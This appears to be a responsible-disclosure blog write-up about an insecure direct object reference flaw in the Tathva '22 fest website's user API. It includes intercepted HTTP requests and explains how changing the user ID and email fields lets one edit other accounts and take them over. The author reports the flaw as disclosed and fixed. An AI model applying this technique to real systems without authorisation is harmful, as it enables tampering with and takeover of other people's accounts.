Hacked Tathva ’22 Biggest Techno-Management Fest in South India
2022-10-24 00:14:31 Author: infosecwriteups.com(查看原文) 阅读量:13 收藏

- 7h3h4ckv157

Hello, Infosec mates ッ✋✋,

In this write-up, I’m sharing a short story about how I hacked Tathva → the biggest Techno-Management Fest in South India.

(Techno-management fest of NIT Calicut)

  • It has found itself a place in every engineering student’s calendar. One of the largest platforms in South India for technical ingenuity and managerial prowess

About the Bug

  • Before I bounce into the topic, let me apprise you about IDOR. There’s a plenty amount of blogs and instructional exercises now accessible around this topic. Still, I’ll furnish a concise note about the same.

Insecure direct object references (IDOR)

  • It’s a type of Access control (or authorization) vulnerability.
  • Access control: Specifies whether the user is permitted to bring the action that they’re endeavouring to accomplish.
  • IDOR: When an application uses user-supplied input to access objects directly. If the User-controlled parameter values are used to access resources or functions directly, it can be exploited.

For more:

https://portswigger.net/web-security/access-control

https://portswigger.net/web-security/access-control/idor

IDOR in Tathva ‘22

My friend Ranjul Arumadi pointed out this event and propelled me to partake in the online Capture the Flag competition. After registration, I ensured that I’m able to edit my details at:

https://www.tathva.org/register?editprofile=true

I’m curious about security. I Intercepted the request while editing the profile and saw some juicy stuff.

First requestOPTIONS /api/users/15862 HTTP/1.1
Host: api.tathva.org
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:106.0) Gecko/20100101 Firefox/106.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Access-Control-Request-Method: PUT
Access-Control-Request-Headers: authorization,content-type
Referer: https://www.tathva.org/
Origin: https://www.tathva.org
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-site
Sec-Gpc: 1
Te: trailers
Connection: close
Second requestPUT /api/users/15871 HTTP/1.1
Host: api.tathva.org
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:106.0) Gecko/20100101 Firefox/106.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/json
Authorization:
Content-Length: 300
Origin: https://www.tathva.org
Referer: https://www.tathva.org/
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-site
Sec-Gpc: 1
Te: trailers
Connection: close
{"id":15871,
"name":" ",
"gender":"male",
"college":" ",
"branch":" ",
"year":" ",
"state":" ",
"district":" ",
"phone":" "
}

Vulnerability confirmation

You can see the “/api/users/<ID>” at the top of the request.

This 5-digit <ID> value can be manually altered, and the attacker can rework the details of other users without their knowledge.

Eg:

Suppose, the Attacker’s ID number = 15860.
He/she/they can alter this value and set as any five digit random value. So, the details of the corresponding user’s will change without their knowledge.

Impact

  • Integrity: High

Integrity: The ability to ensure that a system and its data has not suffered unauthorized modification. Integrity protection protects not only data, but also operating systems, applications and hardware from being altered by unauthorized individuals.

Proof of Concept: Video

Account-Takeover

After encountering this vulnerability, I checked the response of requests and discovered extra stuff.

The Response{"id":<ID>,
"username":<USER-NAME>",
"email":"<MAIL>",
"provider":"google",
"resetPasswordToken":null,
"confirmationToken":null,
"confirmed":true,
"blocked":false,
"name":"<NAME>",
"refCode":null,
"state":"<STATE>",
"district":"<DIS>",
"gender":"male",
"tathvaId":"T22-JSAVL",
"hostel":null,
"createdAt":"<DATE>",
"updatedAt":"<DATE>",
"phone":"<NUMBER>",
"college":"<COLLEGE>",
"year":"Year 4",
"branch":"any",
"registeredWorkshops":[],
"registeredEvents":[],
"registeredLectures":[],
"registeredCompetitions":[],
"bookedAccomodation":null,
"event_admin":null,
"event_volunteer":null,
"competition_admin":null,
"competition_volunteer":null,
"workshop_admin":null,
"workshop_volunteer":null,
"lecture_admin":null,
"lecture_volunteer":null
}By simply editing"email":"<MAIL>" from the response itself, we can takeover the victim's account.Eg: change [email protected] to [email protected]The attacker can take control of the account through owned mails.

All the User accounts registerd on the domain becomes vulnerable.

Before getting too late, I contacted them via mail and through my connections.

  • Reported on: Oct 20, 2022, 1:05 AM
  • Fix Confirmation: Oct 22, 2022, 11:44 PM
  • Bounty Reward: $0

Happy to secure!

From Infosec Writeups: A lot is coming up in the Infosec every day that it’s hard to keep up with. Join our weekly newsletter to get all the latest Infosec trends in the form of 5 articles, 4 Threads, 3 videos, 2 GitHub Repos and tools, and 1 job alert for FREE!


文章来源: https://infosecwriteups.com/hacked-tathva-22-biggest-techno-management-fest-in-south-india-6a95435c82e7?source=rss----7b722bfd1b8d--bug_bounty
如有侵权请联系:admin#unsafe.sh